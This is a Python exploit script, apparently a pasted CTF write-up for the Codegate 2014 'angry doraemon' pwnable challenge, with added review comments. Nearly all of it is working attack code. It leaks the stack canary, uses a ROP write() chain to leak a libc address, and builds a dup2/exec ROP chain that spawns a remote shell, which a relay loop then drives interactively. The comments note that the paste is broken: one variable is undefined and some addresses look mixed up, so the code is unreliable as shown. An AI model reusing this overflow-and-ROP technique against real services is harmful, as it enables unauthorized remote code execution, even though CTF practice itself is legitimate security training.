Codegate 2014 doraemon write up by @_g05u_

a guest
Feb 23rd, 2014
  1. #!/usr/bin/env python
  2. #-*- coding:utf-8 -*-
  3.  
  4. # Codegate 2014 write up by @_g05u_
  5. # angry doraemon
  6. # pwnable 250
  7. # null-life.com
  8.  
  9. import re
  10. import os
  11. import sys
  12. import math
  13. import time
  14. import struct
  15. import socket
  16.  
HOST = "58.229.183.18"  # challenge server used during the 2014 CTF
PORT = 8888

# Ubuntu 13.10 x86: the two libc offsets below were taken from that exact
# library build and are meaningless against any other libc.
offset_libc_main = 0x19810  # presumably __libc_start_main's offset inside libc (from the name)
offset_dup2 = 0xE11F0       # dup2's offset inside libc

# Fixed addresses inside the challenge binary. The 0x0804xxxx range is the
# classic non-PIE load address; with PIE these would change on every run.
got_libc_main = 0x0804B038  # GOT slot holding the resolved libc pointer (from the name)
got_write = 0x080486e0      # NOTE(review): named as a GOT entry, but the value sits where .plt stubs usually live - verify against the binary
rop_pop2_ret = 0x080495BE   # pop; pop; ret gadget, used to discard two call arguments
exec_sh = 0x08048C62        # code in the binary the final chain returns into (from the name; not shown here)

# Sample canary from one run. It is dead data: module level reassigns
# `canary = get_canary()` before it is ever read.
canary = "\x00\x8b\xc3\x84"
  30.  
  31.  
def get_socket():
    """Open a TCP connection to HOST:PORT and return the connected socket.

    The caller owns the socket; nothing here closes it.
    """
    return socket.create_connection((HOST, PORT))
  36.    
def read_logo(s):
    """Consume the server banner and the first menu prompt on socket `s`.

    Loops on recv() until a chunk containing 'Waiting 2 seconds' arrives,
    sleeps slightly longer than that pause, then loops again until a chunk
    containing the prompt character '>' arrives. Returns None; the text read
    is discarded.
    """
    logo = ''
    menu = ''
    # Only the most recent chunk is tested, not the accumulated data: a marker
    # split across two recv() calls is never matched, and recv() returning ''
    # (peer closed) simply re-enters the loop. Neither case is handled.
    while 'Waiting 2 seconds' not in logo:
        logo = s.recv(1024 * 5)
    time.sleep(2.2) #wait 2.2 sec - just past the 2-second pause the server announces
    while '>' not in menu:
        menu = s.recv(1024)
  45.        
  46.  
def gadget_leer(addr, n):
    """Build the 20-byte chain that makes the program call write(4, addr, n).

    Layout, as little-endian 32-bit words: the write stub address, the address
    write() returns to, then write's three arguments in order: fd 4 (the "open
    fd", i.e. the socket the caller reads the reply from), `addr`, `n`.
    """
    words = [
        got_write,
        0x080492c5,  # exit return: where write() returns to afterwards
        0x4,         # open fd: the client socket, so the bytes come back to us
        addr,
        n,
    ]
    return ''.join(struct.pack("<I", w) for w in words)
  55.  
def get_canary():
    """Leak the 4-byte stack canary and return it as a raw 4-byte string.

    Connects, picks menu option 4, answers the follow-up prompt with ten 'y'
    bytes and reads 26 bytes back; bytes 22..25 of that reply are taken as the
    canary. The ten bytes match the filler used in the later payloads, where
    the canary sits immediately after them, so the reply evidently echoes
    stack contents past what was sent. A length-bounded echo would close the
    leak, and with it the rest of the chain.
    """
    print '[+] get canary '
    s = get_socket()   
    read_logo(s)
    s.send('4')
    time.sleep(0.1)
    s.recv(1024) #read the follow-up question
    time.sleep(0.1)
    s.send('y'*10)
    time.sleep(0.1)
    mi_opc = s.recv(26) #read the echoed option
    # Assumes all 26 bytes arrive in a single recv(); a short read yields a
    # truncated canary that silently breaks the later payloads.
    _canary = mi_opc[22:]
    print '[+] Canary 0x%s' % (''.join(c.encode('hex') for c in _canary))
    return _canary
  70.  
def get_rop_shell(libc_base):
    """Build the final chain: dup2(4, 0), dup2(4, 1), dup2(4, 2), then exec_sh.

    Each dup2 call is followed by the pop;pop;ret gadget so its two arguments
    are popped before the next call. `libc_base` is the leaked libc load
    address; dup2's runtime address is `libc_base + offset_dup2`.
    """
    dup2_addr = libc_base + offset_dup2
    print '[+] dup2 address: %s' % hex(dup2_addr)

    chain = ''
    # Point stdin, stdout and stderr in turn at fd 4 (the "open fd": the client socket).
    for target_fd in (0, 1, 2):
        chain += struct.pack("<I", dup2_addr)
        chain += struct.pack("<I", rop_pop2_ret)
        chain += struct.pack("<I", 4)
        chain += struct.pack("<I", target_fd)
    chain += struct.pack("<I", exec_sh)
    return chain
  90.  
# Stage 1: leak the canary (see get_canary). This overwrites the sample
# literal defined at the top of the file.
canary = get_canary()
   
print 'Obteniendo libc base'
#get libc address base 
# Stage 2: reuse the option-4 overflow to run gadget_leer(), which makes the
# program write() 4 bytes from the requested address back over the socket.
s = get_socket()   
read_logo(s)
s.send('4')
time.sleep(0.1)
s.recv(1024) #read the follow-up question
time.sleep(0.1)
# Payload layout: 10 filler bytes, the 4-byte canary (put back where it was
# leaked from so the stack check is not tripped), 12 bytes of padding, then
# the chain, which presumably lands on the saved return address.
# NOTE(review): the address passed is the libc *offset* (offset_libc_main),
# not the GOT slot (got_libc_main) defined at the top; the two names look
# mixed up in the paste.
s.send('y'*10 + canary + "A"*12 + gadget_leer(offset_libc_main, 4))
# NOTE(review): `base_libc_main` is defined nowhere in this file, so as pasted
# this line raises NameError right after the recv(). The subtraction is meant
# to turn the leaked pointer into the libc load address.
libc_base_address = struct.unpack("<I", s.recv(4))[0] - base_libc_main
print '[+] Addres libc base: %s' % hex(libc_base_address)
 
print 'Lanzando shell'
#launch shell
# Stage 3: the same overflow a third time, now with the dup2/exec chain.
rop_shell = get_rop_shell(libc_base_address)
s = get_socket()   
read_logo(s)
s.send('4')
time.sleep(0.1)
s.recv(1024) #read the follow-up question
time.sleep(0.1)
s.send('y'*10 + canary + "A"*12 + rop_shell)

# Interactive relay: each line typed locally is sent over the socket and one
# reply chunk is printed. The fixed 0.5 s wait and single recv() mean any
# output longer than 4095 bytes, or slower than half a second, is cut off.
while True:
    sys.stdout.write("$ ")
    sys.stdout.flush()
    c = sys.stdin.readline()
    s.send(c)
    time.sleep(0.5)
    print s.recv(4095)